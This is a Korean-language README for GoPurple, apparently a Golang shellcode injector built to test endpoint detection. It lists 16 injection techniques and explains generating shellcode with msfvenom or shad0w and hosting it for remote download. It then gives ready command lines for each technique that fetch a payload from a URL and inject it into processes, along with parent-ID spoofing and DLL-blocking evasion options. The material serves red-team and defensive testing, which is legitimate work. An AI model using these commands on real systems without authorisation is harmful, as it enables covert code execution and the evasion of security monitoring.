
또 다른 셸코드 실행기로, 엔드포인트 보안 솔루션의 탐지 능력을 평가하기 위한 다양한 기술들로 구성되어 있습니다.
이 프로젝트는 다양한 셸 코드 인젝션 기술을 단순히 모아놓은 것으로, 엔드포인트 탐지 평가 과정을 간소화하고 동시에 Golang 세계에 발을 들이기 위한 개인적인 도전을 목적으로 합니다.
1 - go가 설치되어 있어야 합니다.
2 - 프로젝트 디렉토리에서 애플리케이션을 빌드합니다: go build. 빌드 시스템이 Windows가 아닌 경우 GOOS=windows를 설정하십시오.
_____ _
/ ____| | |
| | __ ___ _ __ _ _ _ __ _ __ | | ___
| | |_ |/ _ \| '_ \| | | | '__| '_ \| |/ _ \
| |__| | (_) | |_) | |_| | | | |_) | | __/
\_____|\___/| .__/ \__,_|_| | .__/|_|\___|
| | | |
|_| |_| by @s3cdev
-a string
Program command line arguments
-b string
block DLL mode (nonms/onlystore for QueueUserAPC )
-p int
Process ID to inject shellcode into
-prog string
program to inject into
-t string
shellcode injection technique to use:
1: CreateFiber
2: syscall
3: CreateThreadNative
4: CreateProcess
5: EtwpCreateEtwThread
6: CreateRemoteThread
7: RtlCreateUserThread
8: CreateThread
9: CreateRemoteThreadNative
10: CreateProcessWithPipe
11: QueueUserAPC
12: CreateThreadpoolWait
13: BananaPhone
14: EnumerateLoadedModules
15: EnumChildWindows
16: EnumPageFilesW
-u string
URL hosting the shellcode
셸코드를 생성해야 하며, 이는 msfvenom 또는 shad0w와 같은 도구를 사용하여 수행할 수 있습니다. 그런 다음 셸코드를 호스팅하여 원격 시스템에서 원격으로 다운로드하고 실행할 수 있도록 해야 합니다. 명확성을 위해 아래 데모는 도구를 사용하는 다양한 방법을 보여줍니다.
1 - BananaPhone 방법 + Shad0w를 셸코드 생성기로 사용한 셸코드 인젝션

2 - QueueUserAPC 기법 + Shad0w를 셸코드 생성기로 사용 + 부모 ID 스푸핑 (explorer를 부모 ID로) + 셸코드(calc)를 포함한 스푸핑된 부모에 의한 프로세스 실행 + 서명되지 않은 DLL 후크로부터 프로세스 보호, 따라서 Microsoft 서명 DLL만 프로세스에 후크할 수 있습니다.

3 - CreateFiber + msfvenom을 셸코드 생성기로 사용한 셸코드 인젝션

1 - gopurple.exe -u urlhostingpayload -t 1 (CreateFiber)
2 - gopurple.exe -u urlhostingpayload -t 2 (Syscall)
3 - gopurple.exe -u urlhostingpayload -t 3 (CreateThreadNative)
4 - gopurple.exe -u urlhostingpayload -t 4 (CreateProcess)
5 - gopurple.exe -u urlhostingpayload -t 5 (EtwpCreateEtwThread)
6 - gopurple.exe -u urlhostingpayload -t 6 -p targetprocess (CreateRemoteThread)
7 - gopurple.exe -u urlhostingpayload -t 7 -p targetprocess (RtlCreateUserThread)
8 - gopurple.exe -u urlhostingpayload -t 8 (CreateThread)
9 - gopurple.exe -u urlhostingpayload -t 9 -p targetprocess (CreateRemoteThreadNative)
10 - gopurple.exe -u urlhostingpayload -t 10 -prog porgram -a processargument (ex:C:\Windows\System32\WindowsPowerShell\v1.0) and processargument(ex:Get-Process) (CreateProcessWithPipe)
11 - gopurple.exe -u urlhostingpayload -t 11 -p targetpidasparentprocess -prog programtoinjectshellcodeinto -b methodtoblockdll(nonms or onlystore) (QueueUserAPC)
nonms = only DLLs that are signed by Microsoft can hook into the process
onlystore = only Microsoft store application's process can hook into the process
12 - gopurple.exe -u urlhostingpayload -t 12 (CreateThreadpoolWait)
13 - gopurple.exe -u urlhostingpayload -t 13 (BananaPhone)
14- gopurple.exe -u urlhostingpayload -t 14 (EnumerateLoadedModules)
15- gopurple.exe -u urlhostingpayload -t 15 (EnumChildWindows)
16- gopurple.exe -u urlhostingpayload -t 16 (EnumPageFilesW)
모든 크레딧은 다음 분들의 훌륭한 연구, 도구 및 영감 덕분입니다:
ne0nd0g: 이 프로젝트의 대부분은 go-shellcode에서 차용되었습니다.
spotheplanet: 블로그 포스트가 저에게 이 방법을 Golang으로 변환하도록 영감을 주었습니다.
_d00mfist: Golang에서 QueueUserAPC 기법의 훌륭한 구현
c__sto: BananaPhone 기법
batsec: 훌륭한 shad0w
chiragsavla94: ProcessInjection에서 영감을 받음
S4R1N: 새로운 대안 코드 실행 방법을 소개해 주셔서 감사합니다.
brimston3님의 지원과 기여에 감사드립니다.
(https://github.com/Ne0nd0g/go-shellcode)
(https://github.com/D00MFist/Go4aRun)
(https://github.com/BishopFox/sliver)
(https://posts.specterops.io/going-4-a-run-eb263838b944)
(https://github.com/C-Sto/BananaPhone)
(https://blog.xpnsec.com/protecting-your-malware)
(https://github.com/3xpl01tc0d3r/ProcessInjection)
(https://github.com/S4R1N/AlternativeShellcodeExec)
이 프로젝트는 교육적이고 윤리적인 테스트 목적으로만 만들어졌습니다. 사전 상호 동의 없이 타겟을 공격하기 위해 GoPurple을 사용하는 것은 불법입니다. 모든 관련 지역, 주 및 연방 법률을 준수하는 것은 최종 사용자의 책임입니다. 개발자는 이 프로그램으로 인한 오용이나 손해에 대해 어떠한 책임도 지지 않습니다.